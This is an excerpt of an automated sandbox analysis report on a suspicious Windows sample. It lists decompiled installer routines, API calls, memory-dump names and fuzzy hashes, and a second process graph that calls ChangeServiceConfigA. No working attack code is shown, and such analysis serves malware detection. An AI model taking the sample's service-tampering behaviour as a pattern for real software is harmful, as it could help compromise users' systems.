                                                                                                                                                                                                                                              0x00a8480b
                                                                                                                                                                                                                                              0x00a847f6
                                                                                                                                                                                                                                              0x00a84806
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A84E6F), ref: 00A847EA
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A84823
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A84847
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A84851
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 359063898-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 75f1381c13eb091f91fae24697c6f8940ab02f6a3d0350a544cfa1562fed7c12
                                                                                                                                                                                                                                              • Instruction ID: 35b84857f360436fd5d3c8e6842c3bbbbd2eb68438b549729d0c46233c4acd69
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75f1381c13eb091f91fae24697c6f8940ab02f6a3d0350a544cfa1562fed7c12
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9111E575604642AFE718EFB49C18F773B6AEB89700F048519FA829B341DA399C078760
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A83680(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				struct tagMSG _v36;
                                                                                                                                                                                                                                              				int _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                                                                                                              				_t16 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                              					if(_t8 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                              								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t16 = 1;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                              						} while (_t8 != 0);
                                                                                                                                                                                                                                              						if(_t16 == 0) {
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					break;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t8;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x00a8368c
                                                                                                                                                                                                                                              0x00a8368f
                                                                                                                                                                                                                                              0x00a83691
                                                                                                                                                                                                                                              0x00a8369f
                                                                                                                                                                                                                                              0x00a836a7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a836ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a836bc
                                                                                                                                                                                                                                              0x00a836bc
                                                                                                                                                                                                                                              0x00a836c0
                                                                                                                                                                                                                                              0x00a836cb
                                                                                                                                                                                                                                              0x00a836c2
                                                                                                                                                                                                                                              0x00a836c4
                                                                                                                                                                                                                                              0x00a836c4
                                                                                                                                                                                                                                              0x00a836da
                                                                                                                                                                                                                                              0x00a836e0
                                                                                                                                                                                                                                              0x00a836e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a836e6
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a836ba
                                                                                                                                                                                                                                              0x00a836ed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A8369F
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836B2
                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00A836CB
                                                                                                                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836DA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2776232527-0
                                                                                                                                                                                                                                              • Opcode ID: bcfcd143f7342f8462041cc4196a0272fe2e663dfc64cd9c60c33082c7dfdecc
                                                                                                                                                                                                                                              • Instruction ID: e5eb25547802ed8aa4d166363f5984a63b3958bc28a34c36e0b57d10c79b3b20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcfcd143f7342f8462041cc4196a0272fe2e663dfc64cd9c60c33082c7dfdecc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01447390025577DF30ABEA9C4CEEB7A7CEB85F10F14022ABA15E2280E5658645C761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00A86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                              				int _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t23 =  *0xa89a3c; // 0xa80000
                                                                                                                                                                                                                                              				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                                                                                                              					L6:
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t24 = _a16;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_a12 != 0) {
                                                                                                                                                                                                                                              							_push(_a12);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                              						FreeResource(_t21);
                                                                                                                                                                                                                                              						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t24;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x00a8651f
                                                                                                                                                                                                                                              0x00a8652a
                                                                                                                                                                                                                                              0x00a86534
                                                                                                                                                                                                                                              0x00a8656b
                                                                                                                                                                                                                                              0x00a86577
                                                                                                                                                                                                                                              0x00a8657c
                                                                                                                                                                                                                                              0x00a86536
                                                                                                                                                                                                                                              0x00a8653e
                                                                                                                                                                                                                                              0x00a86542
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86544
                                                                                                                                                                                                                                              0x00a86547
                                                                                                                                                                                                                                              0x00a8654c
                                                                                                                                                                                                                                              0x00a86549
                                                                                                                                                                                                                                              0x00a86549
                                                                                                                                                                                                                                              0x00a86549
                                                                                                                                                                                                                                              0x00a8655e
                                                                                                                                                                                                                                              0x00a86560
                                                                                                                                                                                                                                              0x00a86569
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86569
                                                                                                                                                                                                                                              0x00a86542
                                                                                                                                                                                                                                              0x00a86587

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00A80000,000007D6,00000005), ref: 00A8652A
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00A80000,00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A86538
                                                                                                                                                                                                                                              • DialogBoxIndirectParamA.USER32(00A80000,00000000,00000547,00A819E0,00000000), ref: 00A86557
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00A82EE8,00000000,00A819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A86560
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1214682469-0
                                                                                                                                                                                                                                              • Opcode ID: c895ae485acd633fc5c75321d7e50d68ac98e67913c2d1330386db3510f1fc6e
                                                                                                                                                                                                                                              • Instruction ID: b02eac8cf84c799b8ed684c01fdcd4aa7d9111e5060d3c0e251786c171455bd5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c895ae485acd633fc5c75321d7e50d68ac98e67913c2d1330386db3510f1fc6e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13012672100209BBEB10AFA99C08DBB7B6DEB89760F000126FE00A3190D7718C1287A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                                                                              			E00A865E8(char* __ecx) {
                                                                                                                                                                                                                                              				char _t3;
                                                                                                                                                                                                                                              				char _t10;
                                                                                                                                                                                                                                              				char* _t12;
                                                                                                                                                                                                                                              				char* _t14;
                                                                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                                                                              				CHAR* _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                                                                                                              				_t15 = __ecx;
                                                                                                                                                                                                                                              				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                              				_t10 = 0;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t3 =  *_t12;
                                                                                                                                                                                                                                              					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                              				} while (_t3 != 0);
                                                                                                                                                                                                                                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                              					if(_t16 <= _t15) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              						L7:
                                                                                                                                                                                                                                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                              							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *_t16 = _t10;
                                                                                                                                                                                                                                              						_t10 = 1;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(_t16);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return _t10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              0x00a865e8
                                                                                                                                                                                                                                              0x00a865ed
                                                                                                                                                                                                                                              0x00a865ef
                                                                                                                                                                                                                                              0x00a865f2
                                                                                                                                                                                                                                              0x00a865f4
                                                                                                                                                                                                                                              0x00a865f4
                                                                                                                                                                                                                                              0x00a865f6
                                                                                                                                                                                                                                              0x00a865f7
                                                                                                                                                                                                                                              0x00a86608
                                                                                                                                                                                                                                              0x00a86611
                                                                                                                                                                                                                                              0x00a86618
                                                                                                                                                                                                                                              0x00a8661c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8660e
                                                                                                                                                                                                                                              0x00a86623
                                                                                                                                                                                                                                              0x00a86625
                                                                                                                                                                                                                                              0x00a8663b
                                                                                                                                                                                                                                              0x00a8663b
                                                                                                                                                                                                                                              0x00a8663d
                                                                                                                                                                                                                                              0x00a86641
                                                                                                                                                                                                                                              0x00a86610
                                                                                                                                                                                                                                              0x00a86610
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86610
                                                                                                                                                                                                                                              0x00a86644
                                                                                                                                                                                                                                              0x00a86647
                                                                                                                                                                                                                                              0x00a86647
                                                                                                                                                                                                                                              0x00a86621
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A82B33), ref: 00A86602
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00A86612
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,00000000), ref: 00A86629
                                                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 00A86635
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Prev$Next
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3260447230-0
                                                                                                                                                                                                                                              • Opcode ID: 19c178774ac5b7ac7a9b4c7acd421f826a21688626362ae9cec71d9d4b94d788
                                                                                                                                                                                                                                              • Instruction ID: 48751d413fae7926815b7eec9aa08c868f1da453fd224b7bc92824cb4777e943
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19c178774ac5b7ac7a9b4c7acd421f826a21688626362ae9cec71d9d4b94d788
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F0F4324041D06EF7367B688CCC8BBAF9CDF9B254B2902BFE49192001E6150D068B62
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A869B0() {
                                                                                                                                                                                                                                              				intOrPtr* _t4;
                                                                                                                                                                                                                                              				intOrPtr* _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				intOrPtr _t11;
                                                                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				 *0xa881f8 = E00A86C70();
                                                                                                                                                                                                                                              				__set_app_type(E00A86FBE(2));
                                                                                                                                                                                                                                              				 *0xa888a4 =  *0xa888a4 | 0xffffffff;
                                                                                                                                                                                                                                              				 *0xa888a8 =  *0xa888a8 | 0xffffffff;
                                                                                                                                                                                                                                              				_t4 = __p__fmode();
                                                                                                                                                                                                                                              				_t11 =  *0xa88528; // 0x0
                                                                                                                                                                                                                                              				 *_t4 = _t11;
                                                                                                                                                                                                                                              				_t5 = __p__commode();
                                                                                                                                                                                                                                              				_t12 =  *0xa8851c; // 0x0
                                                                                                                                                                                                                                              				 *_t5 = _t12;
                                                                                                                                                                                                                                              				_t6 = E00A87000();
                                                                                                                                                                                                                                              				if( *0xa88000 == 0) {
                                                                                                                                                                                                                                              					__setusermatherr(E00A87000);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A871EF(_t6);
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00a869b7
                                                                                                                                                                                                                                              0x00a869c2
                                                                                                                                                                                                                                              0x00a869c8
                                                                                                                                                                                                                                              0x00a869cf
                                                                                                                                                                                                                                              0x00a869d8
                                                                                                                                                                                                                                              0x00a869de
                                                                                                                                                                                                                                              0x00a869e4
                                                                                                                                                                                                                                              0x00a869e6
                                                                                                                                                                                                                                              0x00a869ec
                                                                                                                                                                                                                                              0x00a869f2
                                                                                                                                                                                                                                              0x00a869f4
                                                                                                                                                                                                                                              0x00a86a00
                                                                                                                                                                                                                                              0x00a86a07
                                                                                                                                                                                                                                              0x00a86a0d
                                                                                                                                                                                                                                              0x00a86a0e
                                                                                                                                                                                                                                              0x00a86a15

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A86FC5
                                                                                                                                                                                                                                              • __set_app_type.MSVCRT ref: 00A869C2
                                                                                                                                                                                                                                              • __p__fmode.MSVCRT ref: 00A869D8
                                                                                                                                                                                                                                              • __p__commode.MSVCRT ref: 00A869E6
                                                                                                                                                                                                                                              • __setusermatherr.MSVCRT ref: 00A86A07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1632413811-0
                                                                                                                                                                                                                                              • Opcode ID: a76233d2c42ee66bd06ff93d0c5d1d2d9a79f0e578abbc9f65993f47bb2ffc66
                                                                                                                                                                                                                                              • Instruction ID: 9abdf85a28830c099057095895b097cc5ebf5f31a35c285d32fa293eb12634f8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a76233d2c42ee66bd06ff93d0c5d1d2d9a79f0e578abbc9f65993f47bb2ffc66
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF098B45093019FE768FBB4BE0E6583B71FB14331B60061AE462862F1DF3E85468B15
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:56.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                              Signature Coverage:17.1%
                                                                                                                                                                                                                                              Total number of Nodes:35
                                                                                                                                                                                                                                              Total number of Limit Nodes:0

                                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 17 7ff815f61b10-7ff815f61b17 18 7ff815f61b19-7ff815f61b21 17->18 19 7ff815f61b22-7ff815f61bd8 17->19 18->19 24 7ff815f61bda-7ff815f61be9 19->24 25 7ff815f61c36-7ff815f61c68 19->25 24->25 26 7ff815f61beb-7ff815f61bee 24->26 32 7ff815f61c6a-7ff815f61c7a 25->32 33 7ff815f61cc7-7ff815f61d00 25->33 27 7ff815f61c28-7ff815f61c30 26->27 28 7ff815f61bf0-7ff815f61c03 26->28 27->25 30 7ff815f61c05 28->30 31 7ff815f61c07-7ff815f61c1a 28->31 30->31 31->31 34 7ff815f61c1c-7ff815f61c24 31->34 32->33 35 7ff815f61c7c-7ff815f61c7f 32->35 39 7ff815f61d5e-7ff815f61d97 33->39 40 7ff815f61d02-7ff815f61d11 33->40 34->27 37 7ff815f61cb9-7ff815f61cc1 35->37 38 7ff815f61c81-7ff815f61c94 35->38 37->33 41 7ff815f61c98-7ff815f61cab 38->41 42 7ff815f61c96 38->42 50 7ff815f61d99-7ff815f61da9 39->50 51 7ff815f61df6-7ff815f61e2f 39->51 40->39 44 7ff815f61d13-7ff815f61d16 40->44 41->41 43 7ff815f61cad-7ff815f61cb5 41->43 42->41 43->37 45 7ff815f61d18-7ff815f61d2b 44->45 46 7ff815f61d50-7ff815f61d58 44->46 48 7ff815f61d2d 45->48 49 7ff815f61d2f-7ff815f61d42 45->49 46->39 48->49 49->49 53 7ff815f61d44-7ff815f61d4c 49->53 50->51 52 7ff815f61dab-7ff815f61dae 50->52 59 7ff815f61e8e-7ff815f61ec7 51->59 60 7ff815f61e31-7ff815f61e41 51->60 54 7ff815f61de8-7ff815f61df0 52->54 55 7ff815f61db0-7ff815f61dc3 52->55 53->46 54->51 57 7ff815f61dc5 55->57 58 7ff815f61dc7-7ff815f61dda 55->58 57->58 58->58 61 7ff815f61ddc-7ff815f61de4 58->61 66 7ff815f61ec9-7ff815f61ed9 59->66 67 7ff815f61f26-7ff815f61fe2 ChangeServiceConfigA 59->67 60->59 62 7ff815f61e43-7ff815f61e46 60->62 61->54 64 7ff815f61e48-7ff815f61e5b 62->64 65 7ff815f61e80-7ff815f61e88 62->65 68 7ff815f61e5d 64->68 69 7ff815f61e5f-7ff815f61e72 64->69 65->59 66->67 70 7ff815f61edb-7ff815f61ede 66->70 77 7ff815f61fea-7ff815f61ffc call 7ff815f62049 67->77 78 7ff815f61fe4 67->78 68->69 69->69 71 7ff815f61e74-7ff815f61e7c 69->71 72 7ff815f61f18-7ff815f61f20 70->72 73 7ff815f61ee0-7ff815f61ef3 70->73 71->65 72->67 75 7ff815f61ef5 73->75 76 7ff815f61ef7-7ff815f61f0a 73->76 75->76 76->76 80 7ff815f61f0c-7ff815f61f14 76->80 81 7ff815f62001-7ff815f6202d 77->81 78->77 80->72 83 7ff815f6202f 81->83 84 7ff815f62034-7ff815f62048 81->84 83->84
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ChangeConfigService
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3849694230-0
                                                                                                                                                                                                                                              • Opcode ID: b5d85e2bcd2bcda22bad21d51eb2365963a6ad1e9f6d46d8db03bd053da20471
                                                                                                                                                                                                                                              • Instruction ID: 2b24988db6a038b90ca81cabb45cf61447c649b00cdef148b438b9eb34f098b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5d85e2bcd2bcda22bad21d51eb2365963a6ad1e9f6d46d8db03bd053da20471
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF18130918E4D4FEB68EE28D846BF977D1FB58750F10426AE84EC7291DF74A5818B82
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.333007800.00007FF815F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF815F60000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ff815f60000_aRe53.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                                                                              • Opcode ID: f4a76ca12504d03128a95726818e1369f918ef0e14e2a1283ab07e0f020ddf57
                                                                                                                                                                                                                                              • Instruction ID: aa08a97a691cf2f81dfab09da2380b10554ac7d204710292ff428aa4ba47e3ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4a76ca12504d03128a95726818e1369f918ef0e14e2a1283ab07e0f020ddf57
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03917F30618A4D8FEB68EF28D8857EA77E1FF59350F10416AE84DC7291CF74A985CB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
